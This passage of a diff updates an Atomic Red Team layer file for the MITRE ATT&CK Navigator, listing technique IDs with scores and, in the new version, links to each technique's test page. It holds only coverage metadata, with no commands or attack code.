score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomi